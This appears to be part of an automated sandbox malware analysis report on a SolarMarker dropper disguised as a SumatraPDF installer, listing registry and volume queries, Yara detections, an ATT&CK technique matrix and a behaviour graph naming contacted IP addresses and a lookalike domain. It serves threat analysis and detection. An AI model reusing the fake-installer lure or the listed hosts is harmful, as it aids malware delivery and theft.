      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessorJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeCode function: 7_2_00007FF710E9A0E4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_00007FF710E9A0E4

      Stealing of Sensitive Information

      barindex
      Yara detected SolarMarker Dropper
      Source: Yara matchFile source: i2wBlKtxrM.exe, type: SAMPLE
      Yara detected SolarMarker
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected SolarMarker Dropper
      Source: Yara matchFile source: i2wBlKtxrM.exe, type: SAMPLE
      Yara detected SolarMarker
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts12
      Command and Scripting Interpreter      		2
      Registry Run Keys / Startup Folder      		12
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      System Time Discovery      		Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/Job1
      DLL Side-Loading      		2
      Registry Run Keys / Startup Folder      		1
      Modify Registry      		LSASS Memory111
      Security Software Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
      Non-Application Layer Protocol      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      DLL Side-Loading      		1
      Disable or Modify Tools      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
      Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)131
      Virtualization/Sandbox Evasion      		NTDS131
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script12
      Process Injection      		LSA Secrets1
      Application Window Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common11
      Obfuscated Files or Information      		Cached Domain Credentials2
      File and Directory Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      DLL Side-Loading      		DCSync23
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 2476126 Sample: i2wBlKtxrM.exe Startdate: 14/06/2023 Architecture: WINDOWS Score: 60 29 www.sumatrapdfreader.org 2->29 31 sumatra-website.onrender.com 2->31 33 2 other IPs or domains 2->33 41 Malicious sample detected (through community Yara rule) 2->41 43 Yara detected SolarMarker 2->43 45 Yara detected SolarMarker Dropper 2->45 47 4 other signatures 2->47 8 i2wBlKtxrM.exe 14 8 2->8         started        12 powershell.exe 2->12         started        signatures3 process4 dnsIp5 35 146.70.104.173, 49828, 49831, 49833 TENET-1ZA United Kingdom 8->35 37 files2.sumatrapdfreader.org 104.26.8.244, 443, 49827 CLOUDFLARENETUS United States 8->37 27 C:\Users\...\sumpdf-installer-x64-bundle.exe, PE32+ 8->27 dropped 14 powershell.exe 17 26 8->14         started        17 powershell.exe 8->17         started        19 sumpdf-installer-x64-bundle.exe 8->19         started        21 conhost.exe 12->21         started        file6 process7 dnsIp8 39 82.102.16.41, 49852, 49853, 49854 M247GB Malta 14->39 23 conhost.exe 14->23         started        25 conhost.exe 17->25         started        process9

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.